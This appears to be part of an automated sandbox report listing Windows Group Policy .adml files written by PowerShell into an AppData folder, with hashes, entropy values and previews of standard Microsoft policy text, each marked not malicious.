                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DNS_Client">DNS Client</string>.. <string id="DNS_Domain">Connection-specific DNS suffix</string>.. <string id="DNS_Domain_Help">Specifies a connection-specific DNS suffix. This policy setting supersedes local connection-specific DNS suffixes, and those configured using DHCP.....To use this policy setting, click Enabled, and then enter a string value representing the DNS suffix.....If you enable this policy setting, the DNS suffix that you enter will be applied to all network connections used by computers

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\EAIME.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7775
                                                                                                                                                                                                        Entropy (8bit):4.801945943527714
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Els7BYDGrS9SqHBf0IpqGKJkPsmcjtJiANpyhSz9zxbBiy:A0bMsBHiANpyh89zxbl
                                                                                                                                                                                                        MD5:A2F0FA1F7B955635BAEF6D42E1019FAD
                                                                                                                                                                                                        SHA1:52F10ED5BB525A53AD000BAB3D0AD3A8CC696CB9
                                                                                                                                                                                                        SHA-256:F54FFC98753D1F03710F912F456B1639B18EC692D2E41FF529A79C5BA8A38B8B
                                                                                                                                                                                                        SHA-512:1BB3F4D5A8895C0AA0373E6EBA93636B022BB9709DE40408C46924664A63390593B386EF5A3968F0DBA8DB31F02AFB20455C7AAB95E2498DEB466E89C335D0D9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="L_IME">IME</string>.. <string id="L_TurnOnMisconversionLoggingForMisconversionReport">Turn on misconversion logging for misconversion report</string>.. <string id="L_TurnOnMisconversionLoggingForMisconversionReportExplain">This policy setting allows you to turn on logging of misconversion for the misconversion report.....If you enable this policy setting, misconversion logging is turned on.....If you disable or do not configure this policy setting, misconversion logging is turned off. ....This policy sett

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\EarlyLaunchAM.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (335), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2537
                                                                                                                                                                                                        Entropy (8bit):4.7263609685346974
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:yafKUwDTjsFQCzwDNgVC2G1KJzDD8xr2rZkwJXW2V:yuujKQCzwDWC2G1wzDQr2rZkaV
                                                                                                                                                                                                        MD5:75AAE2A1219696C7D046F25DA1C331B8
                                                                                                                                                                                                        SHA1:0E20307FC43CECFD876B2A03CE998204A4A9D932
                                                                                                                                                                                                        SHA-256:5A5BAD4A99052A7DFFAD794A712F606F4421D0323AF8BA4121BB02034C917C1C
                                                                                                                                                                                                        SHA-512:18DE3563DB066BB209792A31096B0B98BDF8C2BFE9BBE077D9F2443513F60D3896ACECA4362D26F08F1CF43E3E37EEE242D2E608958E0CFF2136DA65A9B1AB46
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<policyDefinitionResources revision="1.0" schemaVersion="1.0">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ELAMCategory">Early Launch Antimalware</string>.. <string id="POL_DriverLoadPolicy_Name">Boot-Start Driver Initialization Policy</string>.. <string id="POL_DriverLoadPolicy_Name_Help">This policy setting allows you to specify which boot-start drivers are initialized based on a classification determined by an Early Launch Antimalware boot-start driver. The Early Launch Antimalware boot-start driver can return the following classifications for each boot-start driver:..- Good: The driver has been signed and has not been tampered with...- Bad: The driver has been identified as malware. It is recommended that you do not allow known bad drivers to be initialized...- Bad, but required for boot: The driver has been identified as malware, but the computer cannot

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\EdgeUI.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4475
                                                                                                                                                                                                        Entropy (8bit):4.731397984218957
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cs+D5x8gm8fK0QfhWpiSbXFNWf7DwirbOgSuvmrIvZZsSuvLD49MCD49Ms+qDxsL:P+D5pmYYh7SeDDrbQUCMOZxq0/tWFV
                                                                                                                                                                                                        MD5:47245202B642C2B6443C63A220226B22
                                                                                                                                                                                                        SHA1:6C3DEDBC58314BF1EDCA6EA0D8161E80B8013B1D
                                                                                                                                                                                                        SHA-256:59B4266A7E379E4047910594D63B44F4A251684A3C97F74CC16585B2779871AD
                                                                                                                                                                                                        SHA-512:4470B0A9568B88965C077F8690BB48BEA88D15A148F2C402D47C17EBB6F52BFB1194FB4B0C328E22DC3772FEF38DCF4E0D33FC966312CAFDFCFA1D0F2539D7E8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2011 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EdgeUI">Edge UI</string>.. <string id="EdgeUI_Help">Contains settings related to system user interfaces attached to the screen edges.</string>.. <string id="TurnOffBackstack">Turn off switching between recent apps</string>.. <string id="TurnOffBackstack_Help">If you enable this setting, users will not be allowed to switch between recent apps. The App Switching option in the PC settings app will be disabled as well.....If you disable or do not configure this policy setting, users will be allowed to sw

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\EncryptFilesonMove.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1260
                                                                                                                                                                                                        Entropy (8bit):4.910898508580554
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ykJvSmJjbLgn7OL2dOrL0ZFp4D/FV:cgeD5x8gm8fKvJDJ074rFV
                                                                                                                                                                                                        MD5:F09A4E370D3321A61FC7456B9A007360
                                                                                                                                                                                                        SHA1:58E0F3E0213B3FF00E2C6694D6A0D3A71D9DE55E
                                                                                                                                                                                                        SHA-256:E32ECF04721C0695C125F1F8E3ECC0ED14179FC85045C1C44C0D4CCDAA74D085
                                                                                                                                                                                                        SHA-512:0BEB4C675E79A2234CAD73F0ADBCAE49B7ED4CD8F62BD6DAC0985EB4C9DBF7C3387B2CEB74C67C2D0052287FD436BECF8D415D22ED72AAB7B296E15C9DFEFECC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NoEncryptOnMove">Do not automatically encrypt files moved to encrypted folders</string>.. <string id="NoEncryptOnMove_Help">This policy setting prevents File Explorer from encrypting files that are moved to an encrypted folder.....If you enable this policy setting, File Explorer will not automatically encrypt files that are moved to an encrypted folder.....If you disable or do not configure this policy setting, File Explorer automatically encrypts files that are moved to an encrypted folder.....This setting ap

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\ErrorReporting.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (790), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):30768
                                                                                                                                                                                                        Entropy (8bit):4.691623979168484
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:hAUh6Hw6B8HwwHhZK3KwrQGj4UQ6ic6jKqBO1Mck1S:hAU8MwwHnwiUQXro
                                                                                                                                                                                                        MD5:8AB1308CBA6530C458F432AB454C3070
                                                                                                                                                                                                        SHA1:099E6CF6F6108281974B2992B3B40E0AED58A994
                                                                                                                                                                                                        SHA-256:0E087D6F548B2CDBF2C2EA12CE78DC4F8B9D1A4979AE6FD955CAC4D350AAFABD
                                                                                                                                                                                                        SHA-512:C19FDEC863339CB92AF86EE3C2244A13E330B4641241A693D1BD61128AB3A13076652AAD0AC8EB8D757760437311CB12CD94D43AC947CE0361EEA7E8DC99E60D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Error Reporting</displayName>.. <description>Windows Error Reporting</description>.. <resources>.. <stringTable>.. <string id="CAT_WindowsErrorReporting">Windows Error Reporting</string>.. <string id="CAT_WindowsErrorReportingAdvanced">Advanced Error Reporting Settings</string>.. <string id="CAT_WindowsErrorReportingConsent">Consent</string>.. <string id="PCH_AllOrNoneDef">Default application reporting settings</string>.. <string id="PCH_AllOrNoneDef_Exclude">Do not report any application errors</string>.. <string id="PCH_AllOrNoneDef_Help">This policy setting controls whether errors in general applications are in

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\EventForwarding.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2548
                                                                                                                                                                                                        Entropy (8bit):4.859559586253688
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:3KbFDiCUSNsojnPFc9QABiRop6FkY060S9vEWmwlCXFfD1ui/5asx6g7wGuVmoeV:65DySNPjPuSRopa0i8tFBnBrhwGZoeV
                                                                                                                                                                                                        MD5:0A764BB7FD1C2BC83CBBA71BDC3F8EB0
                                                                                                                                                                                                        SHA1:A7234960D73C854F981680AD4691ACCC5E3F2024
                                                                                                                                                                                                        SHA-256:EF69C13304DBA64691227AC0C87F03C89120BEB6003722C43E390BDA572331AD
                                                                                                                                                                                                        SHA-512:0F5E549755270FD2E40669321F4E69581BBCB79CE7D905BB6E95E9251C10B76681C6ED19BA623D17C8AD56DD39A6D0104BE60DD0B5FE8045BC4EB8217ED4E772
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0"?>..<policyDefinitionResources revision="1.0" schemaVersion="1.0">...<displayName>Event Forwarding</displayName>.....<description>Policy Definitions For Event Forwarding</description>.....<resources>......<stringTable>.......<string id="EventForwarding">Event Forwarding</string>.... <string id="ForwarderResourceUsage">Configure forwarder resource usage</string>.. <string id="ForwarderResourceUsage_Help">This policy setting controls resource usage for the forwarder (source computer) by controlling the events/per second sent to the Event Collector.....If you enable this policy setting, you can control the volume of events sent to the Event Collector by the source computer. This may be required in high volume environments.....If you disable or do not configure this policy setting, forwarder resource usage is not specified.....This setting applies across all subscriptions for the forwarder (source computer).</string>.. .....<

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\EventLog.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7756
                                                                                                                                                                                                        Entropy (8bit):4.821366715902771
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EuPOfDUFRKtm/P2R7gHzBwRTLfdpSJlIau:bPOfA+g2RCudH
                                                                                                                                                                                                        MD5:B58D99D32DF6E1076E976FA8ABC3EEEA
                                                                                                                                                                                                        SHA1:4AB6E78ECDC35F98D09AE29B0D7C8D9AB19A91FD
                                                                                                                                                                                                        SHA-256:2863EF5940EC4685D1CF61891191647CE435F325720BC9626A0F2214F56E6EC9
                                                                                                                                                                                                        SHA-512:9A0FF4D6D9BB1A53F01A24DD946945CAB0D4A48053035A8435B4CFB0DCF7690C0CC418E72911FCFBA8379617D328253C236F307F62D1627B0087747816D6AAFE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Channel_Log_AutoBackup">Back up log automatically when full</string>.. <string id="Channel_Log_AutoBackup_Help">This policy setting controls Event Log behavior when the log file reaches its maximum size and takes effect only if the "Retain old events" policy setting is enabled.....If you enable this policy setting and the "Retain old events" policy setting is enabled, the Event Log file is automatically closed and renamed when it is full. A new file is then started.....If you disable this policy setting and th

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\EventViewer.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2368
                                                                                                                                                                                                        Entropy (8bit):4.905404060928818
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yQHXEjH4Mj1Zy3snm5R0mM/CJ4tFOmBXOm70oV:cgeD5x8gm8fKI/szB4tFZUoV
                                                                                                                                                                                                        MD5:45EB132CB1F927D22C54EC385A552153
                                                                                                                                                                                                        SHA1:634D98CB8F8BFE12E9CD19CD4764DFCF134CC011
                                                                                                                                                                                                        SHA-256:8911189FB55D6DE6DA90E3ED57336AA7F2323520CF2719CED2E91B76B4AB085D
                                                                                                                                                                                                        SHA-512:32ECD99085199B267FEA70CA5363DFF1270BC083107E80368FD7F48C69E8646078ACFFA3206692CF3F2BF447D4EBB5BBB251F32F1DD712927F836F5751FF47AF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EventViewer">Event Viewer</string>.. <string id="EventViewer_RedirectionProgram">Events.asp program</string>.. <string id="EventViewer_RedirectionProgram_Help">This is the program that will be invoked when the user clicks the events.asp link.</string>.. <string id="EventViewer_RedirectionProgramCommandLineParameters">Events.asp program command line parameters</string>.. <string id="EventViewer_RedirectionProgramCommandLineParameters_Help">This specifies the command line parameters that will be p

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Explorer.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (311), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4363
                                                                                                                                                                                                        Entropy (8bit):4.775276168335737
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmUZsDKU5h9ERZR2s0vJVu2MNFBBzUysV:EpZsDx9g0vJVBMNXBzi
                                                                                                                                                                                                        MD5:B8789197191F1A2C461797C595FD8415
                                                                                                                                                                                                        SHA1:DDCB4910A18C318E8E90CF29A92FE70ADFDB20EE
                                                                                                                                                                                                        SHA-256:6CBA67BF6D239FA46E6F2566F1F8653DCBA053DC828AA731DD768C525AF1BB1D
                                                                                                                                                                                                        SHA-512:D05BF9DE3D8ADD27206F4819283E89533AC83ED97AF159023EF46393B5CAB9D5D95D4C32D15C21A0E895CE3820418D71D29553E420F1ADAE7225AEEEFBE1A91E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AlwaysShowClassicMenu">Display the menu bar in File Explorer </string>.. <string id="AlwaysShowClassicMenu_Help">This policy setting configures File Explorer to always display the menu bar.....Note: By default, the menu bar is not displayed in File Explorer.....If you enable this policy setting, the menu bar will be displayed in File Explorer.....If you disable or do not configure this policy setting, the menu bar will not be displayed in File Explorer.....Note: When the menu bar is not displayed, users can ac

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\ExternalBoot.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2806
                                                                                                                                                                                                        Entropy (8bit):4.897245212995506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gmFa0I0aUFxafehoPd7idK6a0WaZP5Zo5Z0fd5Z1zarCaO5ZVwKd5ZUwY:LeD5pmFa0I0a4afIa9aZPMcda2aOSYvY
                                                                                                                                                                                                        MD5:8417153A964B75197B8A08F35D62C381
                                                                                                                                                                                                        SHA1:2A4820E67495FCCC524E72AFAB923803755C9F2B
                                                                                                                                                                                                        SHA-256:F8B25ED02542858011F65AE02EBD1C4A62558EE28B76A281656FCF1A70E772BC
                                                                                                                                                                                                        SHA-512:F1DEC0EA5AA367C94CCE27B71B3412FCE370CFF75DF44CCEA5CA931BB52992B30D252144188DFA93FE9E5EF573419DF8BCAEAE9C5DFBA8936E24C80CBDC4D291
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Portable Workspace</displayName>.. <description>This file contains Portable Workspace policy settings.</description>.. <resources>.. <stringTable>.. <string id="PortableOperatingSystem">Portable Operating System</string>.. <string id="PortableOperatingSystem_Launcher_DisplayName">Windows To Go Default Startup Options</string>.. <string id="PortableOperatingSystem_Launcher_Help">....This policy setting controls whether the PC will boot to Windows To Go if a USB device containing a Windows To Go workspace is connected, and controls whether users can make changes using the Windows To Go Startup Options Control Panel item.....If you enable

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\FileHistory.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):988
                                                                                                                                                                                                        Entropy (8bit):5.031142948192133
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3F6Et8mTc48vzNgW4ZdNHW4fFV:cgeD5x8gm/TagW4Z/HW4fFV
                                                                                                                                                                                                        MD5:76EF9C90CFE65DE37CDBCD4847D584BE
                                                                                                                                                                                                        SHA1:72977FE03FBED6B2FF3C750405CA0838A547471A
                                                                                                                                                                                                        SHA-256:9341A249C8DB566C91BD171482DAA2FAF9D17EF757DB6CBE6829F75D4FCE9492
                                                                                                                                                                                                        SHA-512:2788E014B9335C70D55EBC24139D09C862D3D016B043566A126E2956B53622F443AEE92B5C28BA83B5C670AD03D948BB6D4435B090BFBB992E33DC2F83D01E2F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>File History</displayName>.. <description>File History</description>.. <resources>.. <stringTable>.. <string id="FileHistoryName">File History</string>.. <string id="DisableFileHistory">Turn off File History</string>.. <string id="DisableFileHistory_explanation">This policy setting allows you to turn off File History.....If you enable this policy setting, File History cannot be activated to create regular, automatic backups.....If you disable or do not configure this policy setting, File History can be activated to create regular, automatic backups.</string>.. </stringTable>.. </resources>..</policyDefinitionResources>..

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\FileRecovery.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2975
                                                                                                                                                                                                        Entropy (8bit):4.8069063103068785
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKn8YD6KENYYqgFd67gJDqrq5x0BsYukrtP4XEgV:LeD5pm3D0uWFm2DaqjCswtPeV
                                                                                                                                                                                                        MD5:353E01C633CBAF640B8238C535A4E3BC
                                                                                                                                                                                                        SHA1:0FC2C8473CB1298245F8D2893D796C3B3BEA14EC
                                                                                                                                                                                                        SHA-256:3A5992E2DC42003E6F1547CE4253134CF8C6270DA6F68FCB6E3FA854B07FADE1
                                                                                                                                                                                                        SHA-512:A7BE0B5FF87A6EEBD9A1CCA5F72DF27DD9A1DBEB127ADE55AC80CA10C7A5084EB87ECE4143724E5920057F6E533AE809E551C62E88876CCF8A16FAF8AB8A1358
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Corrupted File Recovery</string>.. <string id="WdiScenarioExecutionPolicy">Configure Corrupted File Recovery behavior</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting allows you to configure the recovery behavior for corrupted files to one of three states:....Regular: Detection, troubleshooting, and recovery of corrupted files will automatically start with a minimal UI display. Windows will attempt to present you with a dialog box when a system restart is

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\FileRevocation.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (591), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2614
                                                                                                                                                                                                        Entropy (8bit):4.778560797244179
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:c4D5FL8golENFW8jxk1tQYY4DXOc3I+4QZHD75LhhAOoXV:RD5FPoWNFWweQD4TV1Zv5LhHoXV
                                                                                                                                                                                                        MD5:85E6DEC7D2E9D6A930AE1A7B4C9E6CE9
                                                                                                                                                                                                        SHA1:A8C71091F223CD0DCDF3AA8AE4A2D6E1888FD69E
                                                                                                                                                                                                        SHA-256:1E5E1B42CFB88B5072DADEB281779586616FC8A3493F66EE17557A19D9ABC27D
                                                                                                                                                                                                        SHA-512:F0076C0E98DE7CBD06723E647B7CF654CF85CE262832321606FCA066B22FC4C70635D183F2E1F8BD77AA9FC99F9EDEE8BF909DD8708AA3C01F0A8164FEEE9D98
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. Documentation says these are optional, but GPEdit does not agree-->.. <displayName>File Revocation Policy Settings</displayName>.. <description>File Revocation Policy Settings</description>.. <resources>.. <stringTable>.. <string id="FileRevocationCategory">File Revocation</string>.. <string id="DelegatedPackageFamilyNames_Name">Allow Windows Runtime apps to revoke enterprise data</string>.. <string id="DelegatedPackageFamilyNames_Help">Windows Runtime applications can protect content which has been associated with an enterprise identifier (EID), but can only revoke access to content it protected. To allow an application to revoke

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\FileServerVSSProvider.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1516
                                                                                                                                                                                                        Entropy (8bit):4.992519754988731
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8g4t4+3Fbef61yjhZEPaREbCF2LRz8u4tUtTY45y9Qy52fKKnKHPaMfV:cgeD5x8gU8fK8hOaRmC0Rz8u4tYTFynR
                                                                                                                                                                                                        MD5:BFBE8A2102D1DAD98FC3B6A7C9D49809
                                                                                                                                                                                                        SHA1:D2B7FA51C1458FF163A3A687687BC79615A0950E
                                                                                                                                                                                                        SHA-256:DA1FFF29710B8B4D5D3361E38FE64B66D7A39F70AB98D23F02C2F285C7298817
                                                                                                                                                                                                        SHA-512:798D71F3589C310441205512EDF99AC939A53BD7A4381BE6908722C9C41B03788AE7BE9D2B59083D7D39E76D9CFA8D7EA1DD4BCFD3800602188A6185C64B6941
                                                                                                                                                                                                        Malicious:false
